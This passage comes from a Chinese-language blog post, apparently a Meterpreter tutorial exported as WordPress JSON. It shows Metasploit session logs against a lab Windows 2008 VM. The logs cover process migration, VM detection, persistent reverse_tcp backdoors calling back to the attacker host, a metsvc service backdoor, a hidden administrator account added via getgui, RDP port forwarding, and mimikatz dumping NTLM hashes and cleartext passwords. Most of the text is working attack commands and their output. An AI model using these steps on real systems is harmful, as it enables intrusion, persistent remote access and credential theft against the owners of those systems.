    976   492   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32spoolsv.exe<\/p>\n\n\n\n
    1056  492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:Program FilesVMwareVMware Toolsvmtoolsd.exe<\/p>\n\n\n\n
    1332  492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Program FilesVMwareVMware Toolsvmtoolsd.exe<\/p>\n\n\n\n
    1560  492   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32dllhost.exe<\/p>\n\n\n\n
    1640  492   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32msdtc.exe<\/p>\n\n\n\n
    1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32taskhost.exe<\/p>\n\n\n\n
    2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32dwm.exe<\/p>\n\n\n\n
    2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Windowsexplorer.exe<\/p>\n\n\n\n
    2204  2428  mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe<\/p>\n\n\n\n
    2312  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    2332  2044  file.exe          x86     1           WIN-K30V5SI0PCEAdministrator  C:UsersAdministratorDesktopfile.exe<\/p>\n\n\n\n
    2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe<\/p>\n\n\n\n
    2588  492   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe<\/p>\n\n\n\n
    2972  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    meterpreter > migrate 2044 \/\/\u8fc1\u79fb\u5230PID\u4e3a2044\u7684explorer\u8fdb\u7a0b<\/p>\n\n\n\n
    [*] Migrating from 2332 to 2044…<\/p>\n\n\n\n
    [*] Migration completed successfully.<\/p>\n\n\n\n
    meterpreter ><\/p>\n\n\n\n
    meterpreter > ps<\/p>\n\n\n\n
    Process List<\/p>\n\n\n\n
    ============<\/p>\n\n\n\n
    PID   PPID  Name              Arch    Session     User                           Path<\/p>\n\n\n\n
    —   —-  —-              —-    ——-     —-                           —-<\/p>\n\n\n\n
    0     0     [System Process]          4294967295                                <\/p>\n\n\n\n
    4     0     System            x86_64  0                                        <\/p>\n\n\n\n
    244   4     smss.exe          x86_64  0           NT AUTHORITYSYSTEM            SystemRootSystem32smss.exe<\/p>\n\n\n\n
    264   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    336   328   csrss.exe         x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\csrss.exe<\/p>\n\n\n\n
    388   380   csrss.exe         x86_64  1           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\csrss.exe<\/p>\n\n\n\n
    396   328   wininit.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\wininit.exe<\/p>\n\n\n\n
    432   380   winlogon.exe      x86_64  1           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\winlogon.exe<\/p>\n\n\n\n
    492   396   services.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\services.exe<\/p>\n\n\n\n
    500   396   lsass.exe         x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\lsass.exe<\/p>\n\n\n\n
    512   396   lsm.exe           x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\lsm.exe<\/p>\n\n\n\n
    596   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    656   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    748   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    796   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    840   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\\Windows\\system32\\conhost.exe<\/p>\n\n\n\n
    860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\\Windows\\system32\\cmd.exe<\/p>\n\n\n\n
    884   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    924   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    972   492   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\\Windows\\system32\\sppsvc.exe<\/p>\n\n\n\n
    976   492   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\spoolsv.exe<\/p>\n\n\n\n
    1056  492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\\Program Files\\VMware\\VMware Toolsvmtoolsd.exe<\/p>\n\n\n\n
    1332  492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\\Program Files\\VMware\\VMware Toolsvmtoolsd.exe<\/p>\n\n\n\n
    1560  492   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\dllhost.exe<\/p>\n\n\n\n
    1640  492   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\\Windows\\system32\\msdtc.exe<\/p>\n\n\n\n
    1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\\Windows\\system32\\taskhost.exe<\/p>\n\n\n\n
    2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\\Windows\\system32\\Dwm.exe<\/p>\n\n\n\n
    2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\\Windows\\Explorer.EXE<\/p>\n\n\n\n
    2312  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\Microsoft.NETFramework64v2.0.50727\\mscorsvw.exe<\/p>\n\n\n\n
    2588  492   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:\\Windows\\Microsoft.NETFrameworkv2.0.50727\\mscorsvw.exe<\/p>\n\n\n\n
    2972  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\\Windows\\system32\\svchost.exe<\/p>\n\n\n\n
    \u5982\u4e0a\u6240\u793afile.exe\u8fdb\u7a0b\u5df2\u7ecf\u6ca1\u4e86\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f\u5982\u679c\u5b58\u5728\u6740\u8f6f\u7684\u8bdd\u53ef\u80fd\u4f1a\u963b\u6b62\u8fdb\u7a0b\u6ce8\u5165
    (3).\u6d4b\u8bd5\u662f\u4e0d\u662f\u865a\u62df\u673a<\/p>\n\n\n\n
    meterpreter > run post\/windows\/gather\/checkvm<\/p>\n\n\n\n
    [*] Checking if WIN-K30V5SI0PCE is a Virtual Machine …..<\/p>\n\n\n\n
    [*] This is a VMware Virtual Machine<\/p>\n\n\n\n
    \u6211\u76842008\u662f\u88c5\u5728VMWare\u4e0a\u7684
    (4).\u5b89\u88c5\u540e\u95e8
    \u65b9\u6cd5\u4e00:persistence\u65b9\u6cd5<\/p>\n\n\n\n
    meterpreter > run  persistence -h<\/p>\n\n\n\n
    Meterpreter Script for creating a persistent backdoor on a target host.<\/p>\n\n\n\n
    OPTIONS:<\/p>\n\n\n\n
        -A        Automatically start a matching multi\/handler to connect to the agent<\/p>\n\n\n\n
        -L <opt>  Location in target host where to write payload to, if none %TEMP% willbe used.<\/p>\n\n\n\n
        -P <opt>  Payload to use, default is windows\/meterpreter\/reverse_tcp.<\/p>\n\n\n\n
        -S        Automatically start the agent on boot as a service (with SYSTEM privileges)<\/p>\n\n\n\n
        -T <opt>  Alternate executable template to use<\/p>\n\n\n\n
        -U        Automatically start the agent when the User logs on<\/p>\n\n\n\n
        -X        Automatically start the agent when the system boots<\/p>\n\n\n\n
        -h        This help menu<\/p>\n\n\n\n
        -i <opt>  The interval in seconds between each connection attempt<\/p>\n\n\n\n
        -p <opt>  The port on the remote host where Metasploit is listening<\/p>\n\n\n\n
        -r <opt>  The IP of the system running Metasploit listening for the connect back<\/p>\n\n\n\n
     \u6267\u884c:<\/p>\n\n\n\n
    meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129<\/p>\n\n\n\n
    [*] Running Persistance Script<\/p>\n\n\n\n
    [*] Resource file for cleanup created at \/root\/.msf4\/logs\/persistence\/WIN-K30V5SI0PCE_20140313.5419\/WIN-K30V5SI0PCE_20140313.5419.rc<\/p>\n\n\n\n
    [*] Creating Payload=windows\/meterpreter\/reverse_tcp LHOST=192.168.111.129 LPORT=2241<\/p>\n\n\n\n
    [*] Persistent agent script is 148439 bytes long<\/p>\n\n\n\n
    [+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs<\/p>\n\n\n\n
    [*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs<\/p>\n\n\n\n
    [+] Agent executed with PID 2916<\/p>\n\n\n\n
    [*] Installing into autorun as HKLM\\Software\\Microsoft\\Windows\\Current\\Version\\Run\\HstWtPyXHYnhQ<\/p>\n\n\n\n
    [+] Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\Current\\Version\\Run\\HstWtPyXHYnhQ<\/p>\n\n\n\n
    \u73b0\u5728\u9000\u51fa\u670d\u52a1\u5668,\u91cd\u65b0\u914d\u7f6e\u76d1\u542c\u5668<\/p>\n\n\n\n
    msf > use multi\/handler<\/p>\n\n\n\n
    msf exploit(handler) > set PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n
    msf exploit(handler) > set LHOST 192.168.111.129<\/p>\n\n\n\n
    msf exploit(handler) > set LPORT 2241<\/p>\n\n\n\n
    msf exploit(handler) > exploit<\/p>\n\n\n\n
    [*] Started reverse handler on 192.168.111.129:2241<\/p>\n\n\n\n
    [*] Starting the payload handler…<\/p>\n\n\n\n
    [*] Sending stage (769024 bytes) to 192.168.111.133<\/p>\n\n\n\n
    [*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at2014-03-13 23:01:55 +0800<\/p>\n\n\n\n
    \u5982\u56fe\uff0c\u53cd\u5f39\u6210\u529f\uff0c\u8fd9\u4e2a\u88ab\u52a8\u578b\u7684\u540e\u95e8\u5728\u67d0\u4e9b\u7279\u6b8a\u7684\u573a\u5408\u4f1a\u662f\u4e2a\u4e0d\u9519\u7684\u9009\u62e9
    \u65b9\u6cd5\u4e8c:metsvc<\/p>\n\n\n\n
    meterpreter > run metsvc<\/p>\n\n\n\n
    [*] Creating a meterpreter service on port 31337<\/p>\n\n\n\n
    [*] Creating a temporary installation directory C:\\Users\\ADMINI~1\\AppData\\LocalTemp\\HzWbqqRpuBlxn…<\/p>\n\n\n\n
    [*]  >> Uploading metsrv.x86.dll…<\/p>\n\n\n\n
    [*]  >> Uploading metsvc-server.exe…<\/p>\n\n\n\n
    [*]  >> Uploading metsvc.exe…<\/p>\n\n\n\n
    [*] Starting the service…<\/p>\n\n\n\n
         * Installing service metsvc<\/p>\n\n\n\n
    * Starting service<\/p>\n\n\n\n
    Service metsvc successfully installed.<\/p>\n\n\n\n
    metsvc\u540e\u95e8\u5b89\u88c5\u6210\u529f\uff0c\u63a5\u4e0b\u6765\u662f\u8fde\u63a5<\/p>\n\n\n\n
    root@Kali:~# msfconsole<\/p>\n\n\n\n
         ,           ,<\/p>\n\n\n\n
        \/            <\/p>\n\n\n\n
       ((__—,,,—__))<\/p>\n\n\n\n
          (_) O O (_)_________<\/p>\n\n\n\n
              _ \/            |<\/p>\n\n\n\n
              o_o    M S F   |<\/p>\n\n\n\n
                      _____  |  *<\/p>\n\n\n\n
                    |||   WW|||<\/p>\n\n\n\n
                    |||     |||<\/p>\n\n\n\n
    Using notepad to track pentests? Have Metasploit Pro report on hosts,<\/p>\n\n\n\n
    services, sessions and evidence — type ‘go_pro’ to launch it now.<\/p>\n\n\n\n
           =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]<\/p>\n\n\n\n
    + — –=[ 1239 exploits – 755 auxiliary – 207 post<\/p>\n\n\n\n
    + — –=[ 324 payloads – 31 encoders – 8 nops<\/p>\n\n\n\n
    msf > use  exploit\/multi\/handler<\/p>\n\n\n\n
    msf exploit(handler) > set PAYLOAD windows\/meterpreter\/metsvc_bind_tcp<\/p>\n\n\n\n
    msf exploit(handler) > show options<\/p>\n\n\n\n
    Module options (exploit\/multi\/handler):<\/p>\n\n\n\n
       Name  Current Setting  Required  Description<\/p>\n\n\n\n
       —-  —————  ——–  ———–<\/p>\n\n\n\n
    Payload options (windows\/metsvc_bind_tcp):<\/p>\n\n\n\n
       Name      Current Setting  Required  Description<\/p>\n\n\n\n
       —-      —————  ——–  ———–<\/p>\n\n\n\n
       EXITFUNC  process          yes       Exit technique: seh, thread, process, none<\/p>\n\n\n\n
       LPORT     4444             yes       The listen port<\/p>\n\n\n\n
       RHOST                      no        The target address<\/p>\n\n\n\n
    Exploit target:<\/p>\n\n\n\n
       Id  Name<\/p>\n\n\n\n
       —  —-<\/p>\n\n\n\n
       0   Wildcard Target<\/p>\n\n\n\n
    msf exploit(handler) > set RHOST 192.168.111.133<\/p>\n\n\n\n
    msf exploit(handler) > set LPORT 31337<\/p>\n\n\n\n
    msf exploit(handler) > exploit<\/p>\n\n\n\n
    [*] Started bind handler<\/p>\n\n\n\n
    [*] Starting the payload handler…<\/p>\n\n\n\n
    [*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at2014-03-13 23:12:54 +0800<\/p>\n\n\n\n
    meterpreter ><\/p>\n\n\n\n
    \u65b9\u6cd5\u4e09:\u8fd9\u4e2a\u662f\u7c7b\u4f3c\u4e8e\u6dfb\u52a0\u8d26\u62373389\u8fdc\u7a0b\u8fde\u63a5<\/p>\n\n\n\n
    meterpreter > run getgui -u zero -p haizeiwang123_<\/p>\n\n\n\n
    [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator<\/p>\n\n\n\n
    [*] Carlos Perez carlos_perez@darkoperator.com<\/p>\n\n\n\n
    [*] Setting user account for logon<\/p>\n\n\n\n
    [*]     Adding User: zero with Password: haizeiwang123_<\/p>\n\n\n\n
    [*]     Hiding user from Windows Login screen<\/p>\n\n\n\n
    [*]     Adding User: zero to local group ‘Remote Desktop Users’<\/p>\n\n\n\n
    [*]     Adding User: zero to local group ‘Administrators’<\/p>\n\n\n\n
    [*] You can now login with the created user<\/p>\n\n\n\n
    [*] For cleanup use command: run multi_console_command -rc \/root\/.msf4\/logs\/scripts\/getgui\/clean_up__20140314.4134.rc<\/p>\n\n\n\n
    meterpreter ><\/p>\n\n\n\n
    (5).\u7aef\u53e3\u8f6c\u53d1
    \u4e3b\u673a\u5904\u4e8e\u5185\u7f51\u4e5f\u662f\u6bd4\u8f83\u5e38\u89c1\u7684,metasploit\u81ea\u5e26\u4e86\u4e00\u4e2a\u7aef\u53e3\u8f6c\u53d1\u5de5\u5177<\/p>\n\n\n\n
    meterpreter > portfwd -h<\/p>\n\n\n\n
    Usage: portfwd [-h] [add | delete | list | flush] [args]<\/p>\n\n\n\n
    OPTIONS:<\/p>\n\n\n\n
        -L <opt>  The local host to listen on (optional).<\/p>\n\n\n\n
        -h        Help banner.<\/p>\n\n\n\n
        -l <opt>  The local port to listen on.<\/p>\n\n\n\n
        -p <opt>  The remote port to connect to.<\/p>\n\n\n\n
        -r <opt>  The remote host to connect to.<\/p>\n\n\n\n
    meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133<\/p>\n\n\n\n
    [-] You must supply a local port, remote host, and remote port.<\/p>\n\n\n\n
    meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133<\/p>\n\n\n\n
    [*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389<\/p>\n\n\n\n
    meterpreter ><\/p>\n\n\n\n
    \u63a5\u4e0b\u6765\u8fd0\u884c<\/p>\n\n\n\n
    rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234<\/p>\n\n\n\n
    (6).\u83b7\u53d6\u5bc6\u7801
    \u6cd5\u56fd\u795e\u5668mimikatz\u53ef\u4ee5\u76f4\u63a5\u83b7\u5f97\u64cd\u4f5c\u7cfb\u7edf\u7684\u660e\u6587\u5bc6\u7801,meterpreter\u6dfb\u52a0\u4e86\u8fd9\u4e2a\u6a21\u5757
    \u9996\u5148\u52a0\u8f7dmimikatz\u6a21\u5757
    \u7531\u4e8e\u6211\u7684Windows 2008\u662f64\u4f4d\u7684\uff0c\u6240\u4ee5\u5148\u8981\u8f6c\u79fb\u523064\u4f4d\u8fdb\u7a0b<\/p>\n\n\n\n
    meterpreter > ps<\/p>\n\n\n\n
    ……<\/p>\n\n\n\n
    2000  472   dllhost.exe        x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32dllhost.exe<\/p>\n\n\n\n
    2264  1832  explorer.exe       x86_64  2           WIN-K30V5SI0PCEzero           C:Windowsexplorer.exe<\/p>\n\n\n\n
    2292  2264  vmtoolsd.exe       x86_64  2           WIN-K30V5SI0PCEzero           C:Program FilesVMwareVMware Toolsvmtoolsd.exe<\/p>\n\n\n\n
    2520  372   FfBoPtYGlNj.exe    x86     1           WIN-K30V5SI0PCEAdministrator  C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe<\/p>\n\n\n\n
    2780  2256  winlogon.exe       x86_64  2           NT AUTHORITYSYSTEM            C:WindowsSystem32winlogon.exe<\/p>\n\n\n\n
    3028  880   dwm.exe            x86_64  2           WIN-K30V5SI0PCEzero           C:WindowsSystem32dwm.exe<\/p>\n\n\n\n
    meterpreter > migrate 2780<\/p>\n\n\n\n
    [*] Removing existing TCP relays…<\/p>\n\n\n\n
    [*] Successfully stopped TCP relay on 0.0.0.0:1234<\/p>\n\n\n\n
    [*] 1 TCP relay(s) removed.<\/p>\n\n\n\n
    [*] Migrating from 1428 to 2264…<\/p>\n\n\n\n
    [*] Migration completed successfully.<\/p>\n\n\n\n
    [*] Recreating TCP relay(s)…<\/p>\n\n\n\n
    [*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389<\/p>\n\n\n\n
    meterpreter > load mimikatz<\/p>\n\n\n\n
    Loading extension mimikatz…success.<\/p>\n\n\n\n
    meterpreter ><\/p>\n\n\n\n
    \u83b7\u53d6\u5bc6\u7801\u54c8\u5e0c:<\/p>\n\n\n\n
    meterpreter > msv<\/p>\n\n\n\n
    [+] Running as SYSTEM<\/p>\n\n\n\n
    [*] Retrieving msv credentials<\/p>\n\n\n\n
    msv credentials<\/p>\n\n\n\n
    ===============<\/p>\n\n\n\n
    AuthID    Package    Domain           User              Password<\/p>\n\n\n\n
    ——    ——-    ——           —-              ——–<\/p>\n\n\n\n
    0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }<\/p>\n\n\n\n
    0;593431  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }<\/p>\n\n\n\n
    0;593459  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }<\/p>\n\n\n\n
    0;995     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO)<\/p>\n\n\n\n
    0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)<\/p>\n\n\n\n
    0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)<\/p>\n\n\n\n
    0;47971   NTLM                                          n.s. (Credentials KO)<\/p>\n\n\n\n
    0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)<\/p>\n\n\n\n
    \u83b7\u53d6\u660e\u6587\u5bc6\u7801<\/p>\n\n\n\n
    meterpreter > kerberos<\/p>\n\n\n\n
    [+] Running as SYSTEM<\/p>\n\n\n\n
    [*] Retrieving kerberos credentials<\/p>\n\n\n\n
    kerberos credentials<\/p>\n\n\n\n
    ====================<\/p>\n\n\n\n
    AuthID    Package    Domain           User              Password<\/p>\n\n\n\n
    ——    ——-    ——           —-              ——–<\/p>\n\n\n\n
    0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$<\/p>\n\n\n\n
    0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$<\/p>\n\n\n\n
    0;47971   NTLM                                        <\/p>\n\n\n\n
    0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE    <\/p>\n\n\n\n
    0;995     Negotiate  NT AUTHORITY     IUSR            <\/p>\n\n\n\n
    0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     ceshimima123_<\/p>\n\n\n\n
    0;593459  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_<\/p>\n\n\n\n
    0;593431  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_<\/p>\n","protected":false},"excerpt":{"rendered":"
    0x01\u521d\u8bc6Meterpreter 1.1.\u4ec0\u4e48\u662f<\/p>\n
    Read MoreMeterpreter\u547d\u4ee4\u8be6\u89e3<\/a><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[41],"tags":[],"class_list":["post-305","post","type-post","status-publish","format-standard","hentry","category-41"],"_links":{"self":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts\/305","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/comments?post=305"}],"version-history":[{"count":1,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts\/305\/revisions"}],"predecessor-version":[{"id":306,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/posts\/305\/revisions\/306"}],"wp:attachment":[{"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/media?parent=305"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/categories?post=305"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sportai.asia\/index.php\/wp-json\/wp\/v2\/tags?post=305"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}